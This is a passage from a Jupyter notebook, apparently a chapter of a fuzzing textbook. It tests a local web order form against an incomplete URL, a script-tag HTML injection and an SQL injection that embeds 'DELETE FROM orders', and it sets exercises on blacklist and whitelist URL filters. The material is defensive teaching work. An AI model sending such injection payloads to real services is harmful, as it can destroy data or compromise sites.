     "iopub.execute_input": "2025-01-16T10:12:28.149853Z",
     "iopub.status.busy": "2025-01-16T10:12:28.149772Z",
     "iopub.status.idle": "2025-01-16T10:12:28.158471Z",
     "shell.execute_reply": "2025-01-16T10:12:28.158261Z"
    },
    "slideshow": {
     "slide_type": "skip"
    },
    "solution2": "hidden"
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:28] \"GET /order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104 HTTP/1.1\" 200 -\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "\n",
       "<html><body>\n",
       "<div style=\"border:3px; border-style:solid; border-color:#FF0000; padding: 1em;\">\n",
       "  <strong id=\"title\" style=\"font-size: x-large\">Thank you for your Fuzzingbook Order!</strong>\n",
       "  <p id=\"confirmation\">\n",
       "  We will send <strong>One FuzzingBook T-Shirt</strong> to Jane Doe in Seattle, 98104<br>\n",
       "  A confirmation mail will be sent to doe@example.com.\n",
       "  </p>\n",
       "  <p>\n",
       "  Want more swag?  Use our <a href=\"/\">order form</a>!\n",
       "  </p>\n",
       "</div>\n",
       "</body></html>\n"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "execution_count": 186,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "standard_order = \"/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104\"\n",
    "contents = webbrowser(httpd_url + standard_order)\n",
    "HTML(contents)"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 187,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:28.159870Z",
     "iopub.status.busy": "2025-01-16T10:12:28.159770Z",
     "iopub.status.idle": "2025-01-16T10:12:28.161338Z",
     "shell.execute_reply": "2025-01-16T10:12:28.161142Z"
    },
    "slideshow": {
     "slide_type": "skip"
    },
    "solution2": "hidden"
   },
   "outputs": [],
   "source": [
    "assert contents.find(\"Thank you\") > 0"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "skip"
    },
    "solution2": "hidden"
   },
   "source": [
    "We test for incomplete URLs:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 188,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:28.162784Z",
     "iopub.status.busy": "2025-01-16T10:12:28.162711Z",
     "iopub.status.idle": "2025-01-16T10:12:28.167008Z",
     "shell.execute_reply": "2025-01-16T10:12:28.166775Z"
    },
    "slideshow": {
     "slide_type": "skip"
    },
    "solution2": "hidden"
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:28] \"GET /order?item= HTTP/1.1\" 200 -\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "\n",
       "<html><body>\n",
       "<form action=\"/order\" style=\"border:3px; border-style:solid; border-color:#FF0000; padding: 1em;\">\n",
       "  <strong id=\"title\" style=\"font-size: x-large\">Fuzzingbook Swag Order Form</strong>\n",
       "  <p>\n",
       "  Yes! Please send me at your earliest convenience\n",
       "  <select name=\"item\">\n",
       "  <option value=\"tshirt\">One FuzzingBook T-Shirt</option>\n",
       "<option value=\"drill\">One FuzzingBook Rotary Hammer</option>\n",
       "<option value=\"lockset\">One FuzzingBook Lock Set</option>\n",
       "\n",
       "  </select>\n",
       "  <br>\n",
       "  <table>\n",
       "  <tr><td>\n",
       "  <label for=\"name\">Name: </label><input type=\"text\" name=\"name\">\n",
       "  </td><td>\n",
       "  <label for=\"email\">Email: </label><input type=\"email\" name=\"email\"><br>\n",
       "  </td></tr>\n",
       "  <tr><td>\n",
       "  <label for=\"city\">City: </label><input type=\"text\" name=\"city\">\n",
       "  </td><td>\n",
       "  <label for=\"zip\">ZIP Code: </label><input type=\"number\" name=\"zip\">\n",
       "  </tr></tr>\n",
       "  </table>\n",
       "  <input type=\"checkbox\" name=\"terms\"><label for=\"terms\">I have read\n",
       "  the <a href=\"/terms\">terms and conditions</a></label>.<br>\n",
       "  <input type=\"submit\" name=\"submit\" value=\"Place order\">\n",
       "</p>\n",
       "</form>\n",
       "</body></html>\n"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "execution_count": 188,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "bad_order = \"/order?item=\"\n",
    "contents = webbrowser(httpd_url + bad_order)\n",
    "HTML(contents)"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 189,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:28.168418Z",
     "iopub.status.busy": "2025-01-16T10:12:28.168334Z",
     "iopub.status.idle": "2025-01-16T10:12:28.170097Z",
     "shell.execute_reply": "2025-01-16T10:12:28.169876Z"
    },
    "slideshow": {
     "slide_type": "skip"
    },
    "solution2": "hidden"
   },
   "outputs": [],
   "source": [
    "assert contents.find(\"Order Form\") > 0"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "skip"
    },
    "solution2": "hidden"
   },
   "source": [
    "We test for HTML (and JavaScript) injection:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 190,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:28.171620Z",
     "iopub.status.busy": "2025-01-16T10:12:28.171545Z",
     "iopub.status.idle": "2025-01-16T10:12:28.176468Z",
     "shell.execute_reply": "2025-01-16T10:12:28.176258Z"
    },
    "slideshow": {
     "slide_type": "skip"
    },
    "solution2": "hidden"
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:28] \"GET /order?item=tshirt&name=Jane+Doe%3Cscript%3E%3C%2Fscript%3E&email=doe%40example.com&city=Seattle&zip=98104 HTTP/1.1\" 200 -\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "\n",
       "<html><body>\n",
       "<div style=\"border:3px; border-style:solid; border-color:#FF0000; padding: 1em;\">\n",
       "  <strong id=\"title\" style=\"font-size: x-large\">Thank you for your Fuzzingbook Order!</strong>\n",
       "  <p id=\"confirmation\">\n",
       "  We will send <strong>One FuzzingBook T-Shirt</strong> to Jane Doe&lt;script&gt;&lt;/script&gt; in Seattle, 98104<br>\n",
       "  A confirmation mail will be sent to doe@example.com.\n",
       "  </p>\n",
       "  <p>\n",
       "  Want more swag?  Use our <a href=\"/\">order form</a>!\n",
       "  </p>\n",
       "</div>\n",
       "</body></html>\n"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "execution_count": 190,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "injection_order = \"/order?item=tshirt&name=Jane+Doe\" + cgi_encode(\"<script></script>\") + \\\n",
    "    \"&email=doe%40example.com&city=Seattle&zip=98104\"\n",
    "contents = webbrowser(httpd_url + injection_order)\n",
    "HTML(contents)"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 191,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:28.177890Z",
     "iopub.status.busy": "2025-01-16T10:12:28.177801Z",
     "iopub.status.idle": "2025-01-16T10:12:28.179393Z",
     "shell.execute_reply": "2025-01-16T10:12:28.179182Z"
    },
    "slideshow": {
     "slide_type": "skip"
    },
    "solution2": "hidden"
   },
   "outputs": [],
   "source": [
    "assert contents.find(\"Thank you\") > 0\n",
    "assert contents.find(\"<script>\") < 0\n",
    "assert contents.find(\"&lt;script&gt;\") > 0"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "skip"
    },
    "solution2": "hidden"
   },
   "source": [
    "We test for SQL injection:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 192,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:28.180836Z",
     "iopub.status.busy": "2025-01-16T10:12:28.180742Z",
     "iopub.status.idle": "2025-01-16T10:12:28.185982Z",
     "shell.execute_reply": "2025-01-16T10:12:28.185730Z"
    },
    "slideshow": {
     "slide_type": "skip"
    },
    "solution2": "hidden"
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:28] \"GET /order?item=tshirt&name=Robert',+'x',+'x',+'x')%3B+DELETE+FROM+orders%3B+--&email=doe%40example.com&city=Seattle&zip=98104 HTTP/1.1\" 200 -\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "\n",
       "<html><body>\n",
       "<div style=\"border:3px; border-style:solid; border-color:#FF0000; padding: 1em;\">\n",
       "  <strong id=\"title\" style=\"font-size: x-large\">Thank you for your Fuzzingbook Order!</strong>\n",
       "  <p id=\"confirmation\">\n",
       "  We will send <strong>One FuzzingBook T-Shirt</strong> to Robert&#x27;, &#x27;x&#x27;, &#x27;x&#x27;, &#x27;x&#x27;); DELETE FROM orders; -- in Seattle, 98104<br>\n",
       "  A confirmation mail will be sent to doe@example.com.\n",
       "  </p>\n",
       "  <p>\n",
       "  Want more swag?  Use our <a href=\"/\">order form</a>!\n",
       "  </p>\n",
       "</div>\n",
       "</body></html>\n"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "execution_count": 192,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "sql_order = \"/order?item=tshirt&name=\" + \\\n",
    "    cgi_encode(\"Robert', 'x', 'x', 'x'); DELETE FROM orders; --\") + \\\n",
    "    \"&email=doe%40example.com&city=Seattle&zip=98104\"\n",
    "contents = webbrowser(httpd_url + sql_order)\n",
    "HTML(contents)"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "skip"
    },
    "solution2": "hidden"
   },
   "source": [
    "(Okay, so obviously we can now handle the weirdest of names; still, Robert should consider changing his name...)"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 193,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:28.187437Z",
     "iopub.status.busy": "2025-01-16T10:12:28.187298Z",
     "iopub.status.idle": "2025-01-16T10:12:28.189357Z",
     "shell.execute_reply": "2025-01-16T10:12:28.189069Z"
    },
    "slideshow": {
     "slide_type": "skip"
    },
    "solution2": "hidden"
   },
   "outputs": [],
   "source": [
    "assert contents.find(\"DELETE FROM\") > 0\n",
    "assert not orders_db_is_empty()"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "skip"
    },
    "solution2": "hidden"
   },
   "source": [
    "That's it – we're done!"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 194,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:28.190945Z",
     "iopub.status.busy": "2025-01-16T10:12:28.190825Z",
     "iopub.status.idle": "2025-01-16T10:12:28.192531Z",
     "shell.execute_reply": "2025-01-16T10:12:28.192225Z"
    },
    "slideshow": {
     "slide_type": "skip"
    },
    "solution2": "hidden"
   },
   "outputs": [],
   "source": [
    "httpd_process.terminate()"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 195,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:28.194030Z",
     "iopub.status.busy": "2025-01-16T10:12:28.193923Z",
     "iopub.status.idle": "2025-01-16T10:12:28.195788Z",
     "shell.execute_reply": "2025-01-16T10:12:28.195572Z"
    },
    "slideshow": {
     "slide_type": "skip"
    },
    "solution2": "hidden"
   },
   "outputs": [],
   "source": [
    "if os.path.exists(ORDERS_DB):\n",
    "    os.remove(ORDERS_DB)"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "button": false,
    "new_sheet": false,
    "run_control": {
     "read_only": false
    },
    "slideshow": {
     "slide_type": "subslide"
    },
    "solution": "hidden",
    "solution2": "hidden",
    "solution2_first": true,
    "solution_first": true
   },
   "source": [
    "### Exercise 2: Protect the Server\n",
    "\n",
    "Assume that it is not possible for you to alter the server code.  Create a _filter_ that is run on all URLs before they are passed to the server."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "button": false,
    "new_sheet": false,
    "run_control": {
     "read_only": false
    },
    "slideshow": {
     "slide_type": "subslide"
    },
    "solution": "hidden",
    "solution2": "hidden",
    "solution2_first": true,
    "solution_first": true
   },
   "source": [
    "#### Part 1: A Blacklisting Filter\n",
    "\n",
    "Set up a filter function `blacklist(url)` that returns `False` for URLs that should not reach the server.  Check the URL for whether it contains HTML, JavaScript, or SQL fragments."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "button": false,
    "new_sheet": false,
    "run_control": {
     "read_only": false
    },
    "slideshow": {
     "slide_type": "subslide"
    },
    "solution": "hidden",
    "solution2": "hidden",
    "solution2_first": true,
    "solution_first": true
   },
   "source": [
    "#### Part 2: A Whitelisting Filter\n",
    "\n",
    "Set up a filter function `whitelist(url)` that returns `True` for URLs that are allowed to reach the server.  Check the URL for whether it conforms to expectations; use a [parser](Parser.ipynb) and a dedicated grammar for this purpose."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "button": false,
    "new_sheet": false,
    "run_control": {
     "read_only": false
    },
    "slideshow": {
     "slide_type": "skip"
    },
    "solution": "hidden",
    "solution2": "hidden"
   },
   "source": [
    "**Solution.** Left to the reader."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    },
    "solution2": "hidden",
    "solution2_first": true
   },
   "source": [
    "### Exercise 3: Input Patterns\n",
    "\n",
    "To fill out forms, fuzzers could be much smarter in how they generate input values.  Starting with HTML 5, input fields can have a `pattern` attribute defining a _regular expression_ that an input value has to satisfy.  A 5-digit ZIP code, for instance, could be defined by the pattern\n",
    "\n",
    "```html\n",
    "<input type=\"text\" pattern=\"[0-9][0-9][0-9][0-9][0-9]\">\n",
    "```\n",
    "\n",
    "Extract such patterns from the HTML page and convert them into equivalent grammar production rules, ensuring that only inputs satisfying the patterns are produced."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "button": false,
    "new_sheet": false,
    "run_control": {
     "read_only": false
    },
    "slideshow": {
     "slide_type": "skip"
    },
    "solution": "hidden",
    "solution2": "hidden"
   },
   "source": [
    "**Solution.** Left to the reader at this point."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    },
    "solution2": "hidden",
    "solution2_first": true
   },
   "source": [
    "### Exercise 4: Coverage-Driven Web Fuzzing\n",
    "\n",
    "Combine the above fuzzers with [coverage-driven](GrammarCoverageFuzzer.ipynb) and [search-based](SearchBasedFuzzer.ipynb) approaches to maximize feature and code coverage."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "button": false,
    "new_sheet": false,
    "run_control": {
     "read_only": false
    },
    "slideshow": {
     "slide_type": "skip"
    },
    "solution": "hidden",
    "solution2": "hidden"
   },
   "source": [
    "**Solution.** Left to the reader at this point."
   ]
  }
 ],
 "metadata": {
  "ipub": {
   "bibliography": "fuzzingbook.bib",
   "toc": true
  },
  "kernelspec": {
   "display_name": "Python 3",
   "language": "python",
   "name": "python3"
  },
  "language_info": {
   "codemirror_mode": {
    "name": "ipython",
    "version": 3
   },
   "file_extension": ".py",
   "mimetype": "text/x-python",
   "name": "python",
   "nbconvert_exporter": "python",
   "pygments_lexer": "ipython3",
   "version": "3.12.8"
  },
  "toc": {
   "base_numbering": 1,
   "nav_menu": {},
   "number_sections": true,
   "sideBar": true,
   "skip_h1_title": true,
   "title_cell": "",
   "title_sidebar": "Contents",
   "toc_cell": false,
   "toc_position": {},
   "toc_section_display": true,
   "toc_window_display": true
  },
  "toc-autonumbering": false,
  "toc-showmarkdowntxt": false,
  "vscode": {
   "interpreter": {
    "hash": "4185989cf89c47c310c2629adcadd634093b57a2c49dffb5ae8d0d14fa302f2b"
   }
  }
 },
 "nbformat": 4,
 "nbformat_minor": 4
}